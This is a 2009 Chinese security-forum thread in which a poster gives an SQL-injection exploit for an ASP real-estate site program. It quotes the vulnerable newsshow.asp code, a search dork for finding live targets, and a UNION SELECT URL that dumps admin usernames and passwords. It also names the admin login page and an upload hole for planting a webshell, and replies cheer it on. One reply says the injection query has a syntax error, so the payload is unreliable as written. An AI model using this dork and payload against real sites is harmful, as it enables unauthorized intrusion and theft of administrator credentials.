【3.A.S.T】网络安全爱好者 - Powered by Discuz! Board

标题: 房产程序 v1.0注射漏洞分析 [打印本页]

作者: 柔肠寸断 时间: 2009-8-11 17:54 标题: 房产程序 v1.0注射漏洞分析

程序代码

核心提示：漏洞文件：newsshow.asp漏洞代码：% set rs=server.createobject('adodb.recordset')sql='update news set hit=hit+1 where ID='request('id')rs.open sql,conn,1,3%% set ...

复制代码

漏洞文件：newsshow.asp

漏洞代码：

程序代码

复制代码

只分析了这一个，

任意上传漏洞：upfile.asp

有兴趣的可以分析下利用上传拿WEBSHELL

搜索关键词：inurl:baodianlist.asp+信息中心

然后输入

http://127.0.0.1/newsshow.asp?id=50%20union%20select%201,username,password,4,5,6%20from%20admin

复制代码

爆出管理帐号密码

后台登陆地址：admin.asp

剩下的自己搞吧！

作者: dsa3027235 时间: 2009-8-11 21:07

laodao woai ni

作者: wyw12340 时间: 2009-8-12 12:18

1# 柔肠寸断

高人支持顶

作者: Ksnort 时间: 2009-8-12 14:01

很不幸的告诉你 ···最后那个联合查询语法错误··

作者: enterer 时间: 2009-8-14 21:13

后台貌似很容易进不过也太简陋了 ...上传还有限制对于我这个菜鸟无法拿shell

欢迎光临【3.A.S.T】网络安全爱好者 (http://3ast.com/)